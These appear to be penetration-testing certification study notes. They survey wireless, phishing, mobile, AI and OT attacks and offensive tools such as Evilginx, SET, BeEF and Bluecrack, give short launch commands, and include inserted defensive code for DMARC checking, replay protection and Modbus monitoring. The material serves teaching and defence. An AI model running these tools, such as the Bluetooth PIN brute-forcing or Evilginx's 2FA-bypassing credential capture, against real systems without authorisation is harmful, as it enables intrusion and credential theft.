Rogue Access Point Creation: Allows the creation of fake access points to lure unsuspecting users.
Man-in-the-Middle (MITM) Attacks: Facilitates intercepting and manipulating network traffic.
Network Traffic Analysis: Captures and analyzes network packets.
Credential Harvesting: Captures login credentials from victims connecting to the rogue access point.
Plugins and Extensions: Supports various plugins for extending functionality.
User-Friendly Interface: Provides a graphical user interface (GUI) for ease of use.
Use Case: Creating fake access points to capture user credentials and data.
Example: Setting up a fake hotspot named "Free WiFi" to lure users and intercept their data.
Prevention: Educate users to avoid suspicious Wi-Fi networks, use VPNs, and implement secure Wi-Fi settings.
Usage → python3 wifi-pumpkin.py
Aircrack-ng
Purpose: Suite of tools for assessing Wi-Fi network security.
Aircrack-ng is a suite of tools designed for analyzing and cracking WEP and WPA/WPA2 wireless network security.
It is widely used by security professionals and enthusiasts for testing the security of wireless networks.
Aircrack-ng is powerful for conducting various types of wireless network attacks, including packet sniffing, decryption, and cracking encryption keys.
Features:
Packet Capture: Captures and analyzes packets from wireless networks.
Cracking Encryption: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
Injection: Supports packet injection for attacking and testing networks.
Monitoring: Monitors and analyzes wireless traffic.
Compatibility: Works with various wireless adapters that support monitoring and injection.
Components:
airmon-ng: A tool to enable monitor mode on wireless interfaces.
airodump-ng: Captures packets from wireless networks.
aireplay-ng: Injects packets into the network for various attacks.
aircrack-ng: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
airbase-ng: Creates fake access points.
airtun-ng: Creates virtual network interfaces.
packetforge-ng: Creates custom packets for injection.
Use Case: Cracking WEP and WPA-PSK keys to gain unauthorized access to Wi-Fi networks.
Example: Using Aircrack-ng to capture packets and crack the encryption key of a nearby Wi-Fi network.
Prevention: Use strong WPA3 encryption, complex passwords, and regularly update network security settings.
WiGLE.net
Purpose: Database of Wi-Fi networks globally, mapped by geographic location.
WiGLE.net (Wireless Geographic Logging Engine) is a web-based service that provides a platform for mapping and analyzing wireless networks worldwide.
It collects and aggregates data from users who log wireless network information, including Wi-Fi access points, their locations, and other relevant details.
WiGLE.net is commonly used for discovering the geographic distribution of Wi-Fi networks and for research purposes related to wireless network security and geolocation.
Features:
Wireless Network Mapping: Visualizes the location and distribution of Wi-Fi access points on a map.
Data Collection: Aggregates data from users who submit wireless network information.
Search and Filtering: Allows users to search for specific networks and filter results based on various criteria.
AP Data: Provides detailed information about access points, including SSID, MAC address, and encryption type.
Download Data: Users can download collected data for offline analysis.
Use Case: Finding and analyzing the distribution of Wi-Fi networks.
Example: Searching for Wi-Fi networks in a specific area to find vulnerable networks.
Prevention: Secure Wi-Fi networks with strong encryption and avoid broadcasting SSIDs in public places.
InSSIDer
Purpose: Wi-Fi network scanner.
InSSIDer is a wireless network scanner and analyzer tool developed by MetaGeek.
It is designed to help users analyze and troubleshoot wireless networks by providing detailed information about Wi-Fi access points and network performance.
InSSIDer is commonly used by network administrators, security professionals, and enthusiasts to optimize wireless network performance and diagnose connectivity issues.
Features:
Network Discovery: Scans and lists available Wi-Fi networks, displaying detailed information about each network.
Signal Strength: Provides real-time signal strength readings to help identify weak or strong signals.
Channel Analysis: Analyzes and visualizes channel usage to identify congestion and optimize channel selection.
Interference Detection: Identifies potential sources of interference and helps in mitigating issues.
Historical Data: Tracks and displays historical data on network performance for trend analysis.
Network Visualization: Displays networks on a graph to visualize signal strength, channel usage, and network distribution.
Use Case: Analyzing Wi-Fi networks to optimize performance and security.
Example: Identifying overlapping channels and signal strength issues in a home or office network.
Prevention: Regularly scan and optimize Wi-Fi networks to ensure optimal security and performance.
Kismet
Purpose: Wireless network detector, sniffer, and intrusion detection system.
Kismet is an open-source wireless network detector, sniffer, and intrusion detection system.
It is designed to capture and analyze wireless network traffic, making it a valuable tool for network administrators, security professionals, and enthusiasts.
Kismet supports a wide range of wireless devices and can be used to detect and investigate wireless network security issues, including unauthorized access points and client devices.
Features:
Wireless Network Detection: Identifies and maps wireless networks, including hidden networks.
Packet Capture: Captures and logs wireless packets for analysis.
Network Visualization: Provides detailed visualization of network traffic and device locations.
Intrusion Detection: Detects unauthorized access points and potential security threats.
Multi-Interface Support: Supports multiple wireless interfaces for comprehensive monitoring.
Plugin Support: Extensible with various plugins for additional functionality.
Use Case: Monitoring wireless traffic and detecting unauthorized access points.
Example: Using Kismet to detect rogue access points and suspicious activity in a corporate network.
Prevention: Implement continuous monitoring with tools like Kismet to identify and mitigate unauthorized wireless activity.
Usage → sudo kismet
Objective 4.8
Attack Types
Phishing
Definition: Deceptive emails designed to trick recipients into divulging sensitive information.
Example: An email pretending to be from a bank asking for account verification.
Prevention: Use email filters, educate users on recognizing phishing attempts, and implement multi-factor authentication.
Vishing
Definition: Voice phishing, where attackers use phone calls to deceive victims.
Example: A scammer posing as tech support to gain remote access to a victim’s computer.
Prevention: Educate users to verify caller identities and avoid sharing sensitive information over the phone.
Whaling
Definition: Targeted phishing aimed at high-profile individuals within an organization.
Example: A fake email from a CEO asking the CFO for a wire transfer.
Prevention: Train executives on cybersecurity awareness and implement strict verification processes for sensitive requests.
Spear Phishing
Definition: Highly targeted phishing aimed at specific individuals or organizations.
Example: An email tailored to an employee, appearing to come from a trusted colleague, containing a malicious attachment.
Prevention: Regular cybersecurity training and awareness, use of email authentication protocols.
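The "email authentication protocols" named in the prevention lines above are SPF, DKIM and DMARC; the piece that actually stops a spoofed From header is DMARC alignment, which requires the domain that passed SPF or DKIM to match the visible From domain. The check below is an added example (not part of the original notes or any specific mail product) that applies that alignment rule to a parsed Authentication-Results header; the domains, header values and the two-label "organizational domain" shortcut are constructed assumptions for the demo.

```python
"""Added example: DMARC-style alignment check over constructed e-mail headers,
as a mail gateway or SIEM rule might apply it before delivery."""
import re
from email import message_from_string
from email.utils import parseaddr


def org_domain(domain: str) -> str:
    """Relaxed alignment compares registrable domains. Assumption for the demo:
    the registrable domain is the last two labels (real code uses a public
    suffix list so that e.g. example.co.uk is handled correctly)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def _domain_part(value: str) -> str:
    """smtp.mailfrom may carry a full address; keep only the domain."""
    return value.rsplit("@", 1)[-1].lower()


def parse_auth_results(value: str) -> dict:
    """Extract (result, domain) for spf and dkim from an
    Authentication-Results header value."""
    results = {}
    m = re.search(r"spf=(\w+)(?:[^;]*?smtp\.mailfrom=([\w.@+-]+))?", value)
    if m:
        results["spf"] = (m.group(1), _domain_part(m.group(2)) if m.group(2) else None)
    m = re.search(r"dkim=(\w+)(?:[^;]*?header\.d=([\w.-]+))?", value)
    if m:
        results["dkim"] = (m.group(1), m.group(2).lower() if m.group(2) else None)
    return results


def dmarc_verdict(raw_message: str) -> dict:
    """DMARC passes when SPF or DKIM passed AND the passing domain aligns with
    the From header domain; otherwise the demo policy is to quarantine."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rsplit("@", 1)[-1].lower() if "@" in from_addr else ""
    ar = parse_auth_results(msg.get("Authentication-Results", ""))

    spf_result, spf_domain = ar.get("spf", ("none", None))
    dkim_result, dkim_domain = ar.get("dkim", ("none", None))

    spf_aligned = (spf_result == "pass" and spf_domain is not None
                   and org_domain(spf_domain) == org_domain(from_domain))
    dkim_aligned = (dkim_result == "pass" and dkim_domain is not None
                    and org_domain(dkim_domain) == org_domain(from_domain))
    passed = spf_aligned or dkim_aligned
    return {
        "from_domain": from_domain,
        "spf_aligned": spf_aligned,
        "dkim_aligned": dkim_aligned,
        "dmarc_pass": passed,
        "action": "deliver" if passed else "quarantine",
    }


# Constructed sample messages (not real mail). The second one passes SPF and
# DKIM for the attacker's own domain, which is exactly the case that plain
# SPF/DKIM checks accept and only alignment catches.
LEGIT_MESSAGE = """From: Alice <alice@example.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@example.com; dkim=pass header.d=mail.example.com
Subject: Q3 report

Attached is the report.
"""

SPOOFED_MESSAGE = """From: "CEO" <ceo@example.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@attacker-example.test; dkim=pass header.d=attacker-example.test
Subject: Urgent wire transfer

Please process today.
"""

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_MESSAGE), ("spoofed", SPOOFED_MESSAGE)):
        print(name, dmarc_verdict(raw))
```

The point worth remembering from the example is that both messages show spf=pass and dkim=pass; the spoofed one is only rejected because the domains that passed do not align with the From header, which is why deploying SPF and DKIM without a DMARC policy leaves display-name and header-From spoofing open.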
Smishing
Definition: SMS phishing, where attackers send deceptive text messages.
Example: A text message claiming to be from a delivery service with a malicious link.
Prevention: Educate users to be cautious of unsolicited texts and avoid clicking on unknown links.
Dumpster Diving
Definition: Searching through trash to find sensitive information.
Example: Finding discarded documents with personal information in a company’s dumpster.
Prevention: Shred all sensitive documents before disposal and secure trash bins.
Surveillance
Definition: Monitoring individuals or locations to gather information.
Example: Observing the layout and security measures of a target building.
Prevention: Use surveillance detection measures and ensure physical security protocols are followed.
Shoulder Surfing
Definition: Observing someone’s private information over their shoulder.
Example: Watching someone enter their password at an ATM.
Prevention: Use privacy screens, be aware of surroundings, and shield inputs when entering sensitive information.
Tailgating
Definition: Gaining unauthorized access by following someone into a restricted area.
Example: An attacker following an employee through a secure door without using a badge.
Prevention: Implement strict access control measures and train employees to not allow tailgating.
Eavesdropping
Definition: Listening in on private conversations to gather information.
Example: Overhearing confidential discussions in a public place.
Prevention: Use private areas for sensitive conversations and employ sound masking technologies.
Watering Hole
Definition: Compromising a website frequented by a target group to distribute malware.
Example: Injecting malicious code into a popular industry forum visited by target employees.
Prevention: Monitor and secure frequently visited sites and use web filtering tools.
Impersonation
Definition: Pretending to be someone else to gain access or information.
Example: An attacker posing as a maintenance worker to gain physical access to a building.
Prevention: Verify identities of unknown individuals and enforce strict visitor policies.
Credential Harvesting
Definition: Collecting usernames and passwords through deceptive means.
Example: A fake login page capturing credentials of users attempting to sign in.
Prevention: Use secure login mechanisms, educate users on recognizing phishing sites, and implement multi-factor authentication.
Tools
Social Engineering Toolkit (SET)
Purpose: Framework for social engineering penetration tests.
Social Engineering Toolkit (SET) is an open-source framework designed for social engineering attacks.
Developed by TrustedSec, SET is a popular tool used by penetration testers and security professionals to simulate social engineering attacks and assess the effectiveness of security awareness training.
SET provides a variety of attack vectors and techniques, allowing users to craft and execute sophisticated social engineering campaigns.
Features:
Phishing Attacks: Create and deploy phishing emails, websites, and malicious attachments.
Credential Harvesting: Capture login credentials through fake login pages and credential harvesters.
Exploit Delivery: Deliver exploits and payloads using social engineering techniques.
Payload Generation: Generate malicious payloads and executables for various platforms.
Pre-Built Templates: Use pre-configured attack templates for common social engineering scenarios.
Integration: Integrates with Metasploit and other tools for advanced attack capabilities.
Use Case: Creating phishing campaigns and other social engineering attacks.
Example: Simulating a phishing email to test an organization’s security awareness.
Usage → sudo setoolkit (starts the SET framework and presents an interactive menu)
Gophish
Purpose: Phishing simulation tool.
Gophish is an open-source phishing framework designed for creating, managing, and analyzing phishing campaigns.
It allows security professionals and researchers to simulate phishing attacks to assess the effectiveness of security training and identify vulnerabilities in organizations.
Gophish provides a user-friendly interface for setting up phishing campaigns, tracking results, and analyzing the success of various phishing tactics.
Features:
Campaign Management: Create, manage, and track phishing campaigns with ease.
Template Creation: Design and customize phishing emails and landing pages.
Tracking and Analytics: Monitor user interactions with phishing emails and landing pages, including clicks and form submissions.
Reporting: Generate detailed reports on campaign performance and user responses.
Multi-User Support: Allow multiple users to manage and run campaigns with different access levels.
Use Case: Creating and managing phishing campaigns to test user susceptibility.
Example: Sending simulated phishing emails to employees to gauge their response.
Usage → ./gophish (by default Gophish starts and listens on port 3333 for the web interface and port 8080 for the API)
Evilginx
Purpose: Advanced phishing tool.
Evilginx is an open-source phishing framework designed to perform advanced phishing attacks using reverse proxy techniques.
It is specifically used for bypassing two-factor authentication (2FA) protections by intercepting authentication tokens and session cookies.
Evilginx allows attackers to create realistic phishing sites that can capture credentials and session tokens, providing access to protected accounts even if 2FA is enabled.
Features:
Reverse Proxy: Acts as a man-in-the-middle to intercept and relay requests between the victim and the legitimate service.
2FA Bypass: Captures session cookies and authentication tokens to bypass two-factor authentication.
Customizable Phishing Pages: Allows the creation of phishing pages that mimic legitimate login interfaces.
Credential and Token Harvesting: Captures usernames, passwords, and session tokens.
Real-Time Logging: Provides real-time logs of captured credentials and tokens.
Use Case: Performing man-in-the-middle attacks to capture credentials.
Example: Setting up a proxy to intercept login credentials from a phishing site.
theHarvester
Purpose: Information gathering tool.
theHarvester is an open-source information-gathering tool designed for reconnaissance and information retrieval during security assessments.
It is used to collect email addresses, domain names, and other relevant information from various public sources and databases.
This information can be valuable for understanding the target organization and identifying potential attack vectors.
Features:
Email Collection: Harvest email addresses from different sources such as search engines and social media.
Domain Enumeration: Discover domain names and subdomains associated with a target organization.
Public Information Gathering: Collect information from public sources like search engines, social networks, and DNS records.
Multiple Data Sources: Utilizes various APIs and search engines to gather information.
Use Case: Collecting emails, names, and other information from public sources.
Example: Gathering information on a target organization from search engines and social networks.
Usage → python3 theHarvester.py -d example.com -b google
Maltego
Purpose: Data mining tool for link analysis and information gathering.
Maltego is a powerful open-source intelligence (OSINT) and graphical link analysis tool designed for conducting comprehensive reconnaissance and analysis.
It is widely used in cybersecurity, investigations, and intelligence gathering to discover relationships and patterns between various entities such as people, organizations, domains, and IP addresses.
Maltego offers a visual interface that allows users to map out and analyze complex networks of information.
Features:
Graphical Link Analysis: Visualize and analyze relationships between different data points.
Transformations: Use built-in and custom transformations to gather data from various sources.
Data Integration: Integrate data from different sources, including DNS records, social networks, and WHOIS information.
Customizable: Create and use custom transformations and data sources.
Collaboration: Share and collaborate on investigative graphs with team members.
Use Case: Mapping relationships and gathering detailed information on targets.
Example: Visualizing the connections between individuals within an organization.
Recon-ng
Purpose: Web reconnaissance framework.
Recon-ng is an open-source reconnaissance framework designed for gathering information during the reconnaissance phase of security assessments.
It provides a modular and flexible environment for performing OSINT (Open Source Intelligence) to collect and analyze data from various public sources.
Recon-ng is particularly useful for security professionals and penetration testers looking to automate and streamline the information-gathering process.
Features:
Modular Framework: Consists of various modules for different types of reconnaissance, including domain information, email addresses, and more.
API Integration: Supports numerous APIs for data collection from public and commercial sources.
Customizable: Allows users to create and use custom modules and scripts.
Automated Data Collection: Automates the process of querying and collecting data from multiple sources.
Interactive Console: Provides an interactive command-line interface for easy navigation and operation.
Use Case: Performing automated reconnaissance on targets.
Example: Gathering domain and contact information about a target organization.
Usage → python3 recon-ng
Browser Exploitation Framework (BeEF)
Purpose: Browser exploitation tool.
BeEF (Browser Exploitation Framework) is a penetration testing tool designed to assess the security of web browsers.
BeEF focuses on leveraging browser vulnerabilities and misconfigurations to gain access to the client-side environment.
It allows security professionals to demonstrate and exploit weaknesses in browser security by taking control of web browsers through various attack vectors.
Features:
Client-Side Attacks: Exploits vulnerabilities and weaknesses in web browsers to gain control over the client-side environment.
Social Engineering: Uses social engineering techniques to deliver payloads and exploits.
Real-Time Interaction: Provides real-time interaction with compromised browsers through a web-based interface.
Extensive Modules: Includes a wide range of modules for different types of attacks, such as phishing, credential harvesting, and session hijacking.
Post-Exploitation: Allows for post-exploitation activities like capturing screenshots, keylogging, and more.
Use Case: Using browser vulnerabilities to gather information or deliver payloads.
Example: Hooking a target’s browser to control it and deliver exploits.
Usage → ./beef
Objective 4.9
Attack Types
Mobile Attacks
Information Disclosure
Definition: Unauthorized access or exposure of sensitive information.
Example: A malicious app accessing and leaking user data without permission.
Prevention: Implement strong access controls and use encryption for sensitive data.
Jailbreak/Rooting
Definition: Gaining root access to a device to bypass security restrictions.
Example: Using a jailbreaking tool to install unauthorized apps on an iPhone.
Prevention: Regularly update OS, use mobile device management (MDM) solutions to detect and block jailbroken/rooted devices.
Permission Abuse
Definition: Apps requesting and misusing excessive permissions.
Example: A flashlight app requesting access to contacts and SMS.
Prevention: Educate users on reviewing app permissions, use app reputation services to detect malicious apps.
AI Attacks
Prompt Injection
Definition: Manipulating input prompts to deceive AI models.
Example: Crafting inputs to cause an AI chatbot to provide incorrect or harmful responses.
Prevention: Implement input validation and filtering, train AI models to handle unexpected inputs safely.
Model Manipulation
Definition: Altering the AI model to produce unintended behavior.
Example: Poisoning the training data to bias the model’s outputs.
Prevention: Secure training data, validate model integrity regularly.
OT
Register Manipulation
Definition: Altering the values in the control registers of an OT system to manipulate its behavior.
Example: Changing the temperature set point in a thermostat to cause overheating.
Prevention: Implement access controls, monitor and log register changes, use secure protocols.
CAN Bus Attack
Definition: Exploiting vulnerabilities in the Controller Area Network (CAN) bus used in vehicles and industrial systems.
Example: Sending malicious commands to control vehicle functions such as braking or acceleration.
Prevention: Implement authentication and encryption for CAN bus communications, use intrusion detection systems.
Modbus Attack
Definition: Targeting the Modbus protocol, widely used in industrial systems, to intercept or alter commands.
Example: Intercepting Modbus traffic to alter commands sent to a programmable logic controller (PLC).
Prevention: Use secure versions of Modbus, implement network segmentation and encryption.
Plaintext Attack
Definition: Attacking unencrypted data transmissions in OT environments to intercept sensitive information.
Example: Capturing unencrypted commands sent to industrial control systems (ICS).
Prevention: Use encryption protocols like TLS/SSL for data in transit, implement network security measures.
Replay Attack
Definition: Reusing captured legitimate data transmissions to perform unauthorized actions in OT systems.
Example: Replaying captured commands to repeatedly turn on and off industrial machinery.
Prevention: Implement time-sensitive tokens, nonces, and session validation to invalidate reused transmissions.
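The prevention line above lists three controls (time-sensitive tokens, nonces, session validation) without showing how they fit together. The receiver below is an added example (not from the original notes or any OT vendor's protocol) of the usual combination: every command carries a timestamp and a fresh nonce, both are covered by an HMAC under a pre-shared key, and the receiver rejects anything with a bad MAC, a timestamp outside a short window, or a nonce it has already accepted within that window. The key, device names and command strings are constructed for the demo.

```python
"""Added example: receiver-side replay protection for command messages using
timestamp window + nonce cache + HMAC. All values are constructed sample data."""
import hashlib
import hmac
import json
import secrets
import time

SHARED_KEY = b"constructed-demo-key-do-not-reuse"  # assumption: pre-shared per device
MAX_AGE_SECONDS = 30.0  # freshness window; also bounds how long nonces are remembered


def _canonical(body: dict) -> bytes:
    """Stable serialization so sender and receiver MAC the same bytes."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def build_command(sender: str, action: str, now: float) -> dict:
    """Sender side: attach a fresh nonce and timestamp, then sign the whole body."""
    body = {"sender": sender, "action": action, "ts": now, "nonce": secrets.token_hex(8)}
    body["mac"] = hmac.new(SHARED_KEY, _canonical(body), hashlib.sha256).hexdigest()
    return body


class CommandReceiver:
    """Receiver side: verify MAC first (untrusted input), then freshness,
    then nonce uniqueness inside the freshness window."""

    def __init__(self, max_age: float = MAX_AGE_SECONDS):
        self.max_age = max_age
        self.seen = {}  # nonce -> message timestamp

    def _prune(self, now: float) -> None:
        # Nonces older than the window cannot be replayed anyway (the timestamp
        # check rejects them), so they can be forgotten to bound memory.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.max_age}

    def accept(self, message: dict, now: float) -> tuple:
        mac = message.get("mac")
        body = {k: v for k, v in message.items() if k != "mac"}
        expected = hmac.new(SHARED_KEY, _canonical(body), hashlib.sha256).hexdigest()
        if not (isinstance(mac, str) and hmac.compare_digest(mac, expected)):
            return False, "bad mac"
        if abs(now - float(body.get("ts", 0))) > self.max_age:
            return False, "stale timestamp"
        self._prune(now)
        if body.get("nonce") in self.seen:
            return False, "replayed nonce"
        self.seen[body["nonce"]] = body["ts"]
        return True, "ok"


if __name__ == "__main__":
    receiver = CommandReceiver()
    cmd = build_command("hmi-01", "pump:start", now=time.time())
    print(receiver.accept(cmd, now=time.time()))   # first delivery: accepted
    print(receiver.accept(cmd, now=time.time()))   # same bytes again: rejected
```

Note that the nonce cache is only pruned by the same window the timestamp check uses; if the cache forgot nonces faster than the timestamp window expired, a replay in that gap would pass both checks, which is the usual bug in hand-rolled versions of this scheme.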
Near-field Communication (NFC) Attacks
Definition: Exploiting NFC technology to gain unauthorized access or perform malicious actions.
Example: Skimming data from contactless payment cards.
Prevention: Use secure NFC protocols, enable NFC only when needed, use NFC shields.
Bluejacking
Definition: Sending unsolicited messages to Bluetooth-enabled devices.
Example: Sending spam messages to nearby Bluetooth devices.
Prevention: Keep Bluetooth disabled when not in use, set devices to non-discoverable mode.
Radio-frequency Identification (RFID) Attacks
Definition: Exploiting RFID technology to intercept or manipulate data.
Example: Cloning an RFID badge to gain unauthorized access to a building.
Prevention: Use encrypted RFID communications, implement physical security measures.
Bluetooth Spamming
Definition: Sending a large volume of unsolicited messages via Bluetooth.
Example: Overwhelming a Bluetooth device with spam messages to disrupt its operation.
Prevention: Disable Bluetooth when not in use, employ Bluetooth security features.
Tools
Scapy
Function: Packet manipulation tool.
Scapy is an open-source Python library used for packet manipulation and network analysis.
It allows users to create, send, receive, and analyze network packets with a high level of flexibility.
Scapy is often used in network penetration testing, security research, and network troubleshooting due to its powerful capabilities for crafting and analyzing packets.
Features:
Packet Crafting: Create custom packets with a wide range of protocols.
Packet Analysis: Analyze and dissect network packets.
Network Scanning: Perform network scanning and discovery.
Protocol Support: Supports a wide range of protocols, including Ethernet, IP, TCP, UDP, ICMP, and more.
Scripting: Write scripts to automate network tasks and analyses.
Use Case: Crafting and sending custom network packets for penetration testing.
Example: Performing packet crafting to test for vulnerabilities in the CAN bus or Modbus protocols.
tcprelay
Function: Proxy tool for relaying TCP connections.
tcprelay is a tool used to relay TCP traffic between two endpoints.
It is often used in network testing and troubleshooting to redirect TCP connections from one port to another or from one host to another.
It can be useful in scenarios where you need to forward traffic between systems or services, or when you want to redirect traffic for analysis or testing purposes.
Features:
TCP Traffic Forwarding: Relay TCP traffic from one port to another or between hosts.
Port Redirection: Redirect traffic from a local port to a remote port or vice versa.
Flexible Configuration: Configure different source and destination ports and addresses.
Simple Setup: Easy to set up and use for basic TCP traffic forwarding tasks.
Use Case: Forwarding traffic between different network interfaces for testing and debugging.
Example: Relaying traffic from an OT network to analyze and modify data in transit.
Function: Network protocol analyzer and packet capture tool.
Use Case: Capturing and analyzing network traffic.
Example: Monitoring CAN bus or Modbus traffic to detect malicious activity or replay attacks.
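The Modbus Attack and Replay Attack entries above, and the "monitoring Modbus traffic to detect malicious activity or replay attacks" use case here, all come down to decoding the Modbus/TCP frame and looking at the function code. The code below is an added example (not from the original notes, Scapy, or any analyzer product) of a small Modbus/TCP decoder with two detection rules run over constructed sample traffic: a write function code from a host that is not on the writer allowlist, and a byte-identical write frame seen again within a time window (a legitimate resend would carry a new transaction id). The IP addresses, allowlist and frame bytes are constructed for the demo.

```python
"""Added example: Modbus/TCP frame decoding plus two detection rules over
constructed sample traffic (all addresses and frames are made up)."""
import struct
from dataclasses import dataclass

FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
}
WRITE_CODES = {5, 6, 15, 16}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes

    @property
    def is_write(self) -> bool:
        return self.function_code in WRITE_CODES


def parse_modbus_tcp(payload: bytes) -> ModbusFrame:
    """Decode the 7-byte MBAP header (transaction id, protocol id, length,
    unit id, all big-endian) and the PDU (function code + data) after it."""
    if len(payload) < 8:
        raise ValueError("too short for MBAP header + function code")
    tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    if proto != 0:
        raise ValueError(f"unexpected protocol id {proto}")
    if length != len(payload) - 6:  # length counts unit id + PDU
        raise ValueError("MBAP length does not match frame size")
    return ModbusFrame(tid, unit, payload[7], payload[8:])


def detect(events, writers_allowed, replay_window=60.0):
    """events: iterable of (timestamp, src_ip, payload). Returns alert strings.
    Rule 1: write function code from a host not on the allowlist.
    Rule 2: byte-identical write frame (same transaction id and PDU) seen
            again within replay_window, from any source."""
    alerts = []
    recent_writes = {}  # payload bytes -> (timestamp, src_ip) of last sighting
    for ts, src, payload in events:
        try:
            frame = parse_modbus_tcp(payload)
        except ValueError as exc:
            alerts.append(f"{ts:.1f} {src}: malformed frame ({exc})")
            continue
        if not frame.is_write:
            continue
        name = FUNCTION_NAMES.get(frame.function_code, f"fc {frame.function_code}")
        if src not in writers_allowed:
            alerts.append(f"{ts:.1f} {src}: {name} from non-allowlisted host")
        last = recent_writes.get(payload)
        if last is not None and ts - last[0] <= replay_window:
            alerts.append(f"{ts:.1f} {src}: possible replay of {name} "
                          f"(tid {frame.transaction_id}, first seen from {last[1]})")
        recent_writes[payload] = (ts, src)
    return alerts


# Constructed sample traffic: an HMI reads 8 holding registers, writes a
# setpoint, then the same write frame shows up from another host and again
# from the HMI address.
READ_REQ = bytes.fromhex("000100000006010300000008")   # tid 1, fc 3, start 0, qty 8
WRITE_REQ = bytes.fromhex("000200000006010600100190")  # tid 2, fc 6, reg 0x10 = 400
SAMPLE_EVENTS = [
    (0.0, "10.0.0.5", READ_REQ),
    (1.0, "10.0.0.5", WRITE_REQ),
    (5.0, "10.0.0.99", WRITE_REQ),
    (7.0, "10.0.0.5", WRITE_REQ),
]
ALLOWED_WRITERS = {"10.0.0.5"}

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS, ALLOWED_WRITERS):
        print(line)
```

Both rules need a baseline the page already implies: know which hosts are supposed to issue writes (network segmentation makes that list short) and capture traffic at a point where you see every Modbus client, otherwise the replay rule only sees one side of the exchange.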
MobSF (Mobile Security Framework)
Function: Automated security analysis tool for mobile applications.
MobSF (Mobile Security Framework) is an open-source automated mobile application security testing tool designed to perform static and dynamic analysis of mobile applications.
It is widely used by security professionals and developers to identify vulnerabilities and security issues in mobile apps for both Android and iOS platforms.
Features:
Static Analysis: Analyzes the application's source code, binaries, and artifacts without executing the app.
Dynamic Analysis: Executes the application to identify runtime vulnerabilities and issues.
API Testing: Assesses the security of APIs used by the mobile application.
Malware Analysis: Detects potential malware or malicious behavior in mobile apps.
Reporting: Generates detailed reports on security findings, including recommendations for remediation.
Use Case: Static and dynamic analysis of Android and iOS apps.
Example: Analyzing mobile applications for information disclosure, permission abuse, or other security flaws.
Usage → python3 manage.py runserver
Frida
Function: Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
Frida is a dynamic instrumentation toolkit used for reverse engineering and security research.
It allows users to inject code into running processes, enabling real-time analysis and manipulation of applications.
Frida is widely used for debugging, analyzing, and modifying applications on various platforms, including Android, iOS, Windows, and macOS.
Features:
Dynamic Instrumentation: Inject and execute custom scripts in real-time within a running process.
Cross-Platform Support: Works on Android, iOS, Windows, macOS, and Linux.
JavaScript API: Write scripts in JavaScript to interact with and modify processes.
API Hooking: Hook into native functions and APIs to monitor or alter their behavior.
Remote Support: Perform remote instrumentation on devices over the network.
Use Case: Injecting scripts into running processes for debugging and analysis.
Example: Manipulating mobile app behavior or intercepting and modifying OT system commands in real-time.
Drozer
Function: Comprehensive security audit and attack framework for Android.
Drozer is a comprehensive security assessment tool designed for Android applications.
It focuses on identifying and exploiting vulnerabilities in Android apps and the underlying Android operating system.
Drozer provides a suite of tools for performing security assessments, ranging from discovering vulnerabilities to exploiting them.
Features:
Application Scanning: Identify security issues in Android apps, including insecure components and permissions.
Dynamic Analysis: Analyze running applications to find vulnerabilities and exploit them in real-time.
Exploit Modules: Utilize pre-built modules to exploit known vulnerabilities in Android applications.
Custom Scripting: Write custom scripts to automate and extend Drozer’s capabilities.
Interactivity: Interact with Android applications and their components programmatically.
Use Case: Assessing the security of Android applications.
Example: Testing Android apps for vulnerabilities such as information disclosure or misuse of permissions.
Usage → drozer console connect
Android Debug Bridge (ADB)
Function: Command-line tool for interacting with Android devices.
Android Debug Bridge (ADB) is a versatile command-line tool that allows developers and security professionals to communicate with Android devices.
It provides various functionalities for debugging, managing, and controlling Android devices and emulators.
ADB is a key component of the Android SDK (Software Development Kit) and is widely used for development, troubleshooting, and testing.
Features:
Device Management: Interact with and manage Android devices and emulators.
Application Management: Install, uninstall, and manage applications on Android devices.
File Transfer: Transfer files between a computer and an Android device.
Debugging: Execute commands and scripts to debug applications and system components.
System Commands: Access and execute system commands on a connected device.
Use Case: Installing and debugging apps, accessing device logs, and executing shell commands.
Example: Using ADB to gain access to a rooted device for further analysis or exploitation.
Usage → adb start-server
Bluecrack
Function: Bluetooth security tool.
Bluecrack is a tool designed for attacking Bluetooth devices, specifically targeting Bluetooth devices using the Bluetooth Classic (BR/EDR) protocol.
It is primarily used to perform brute-force attacks on Bluetooth PINs to gain unauthorized access to Bluetooth devices.
Bluecrack aims to crack the PIN codes of Bluetooth devices, which can be crucial for security testing and penetration testing.
Features:
Brute-Force Attacks: Performs brute-force attacks on Bluetooth PINs.
PIN Cracking: Attempts to guess the PIN codes used for pairing Bluetooth devices.
Bluetooth Classic Support: Targets Bluetooth devices using Bluetooth Classic (BR/EDR).
Use Case: Testing Bluetooth devices for security weaknesses.
Example: Performing Bluetooth attacks such as Bluejacking or capturing Bluetooth communications.
Usage → bluecrack -i <interface> -a <target_address> -p <pin>
Objective 4.10
PowerShell
Empire/PowerSploit
Function: Post-exploitation framework.
Empire is a PowerShell and Python-based post-exploitation framework that enables red teaming and penetration testing. It provides a range of tools and modules for command-and-control, lateral movement, and data exfiltration.
Empire Features:
PowerShell and Python-Based: Utilizes both PowerShell and Python for various tasks.
Agent Management: Provides capabilities to manage and control multiple agents on compromised systems.
Command and Control: Offers a robust command and control infrastructure.
Post-Exploitation Modules: Includes a wide range of modules for tasks like credential harvesting, privilege escalation, and data exfiltration.
PowerSploit is a collection of PowerShell scripts and modules designed for use in penetration testing and red team operations. It focuses on exploiting and post-exploitation on Windows systems, leveraging PowerShell capabilities.
PowerSploit Features:
PowerShell-Based: Utilizes PowerShell for various post-exploitation and exploitation tasks.
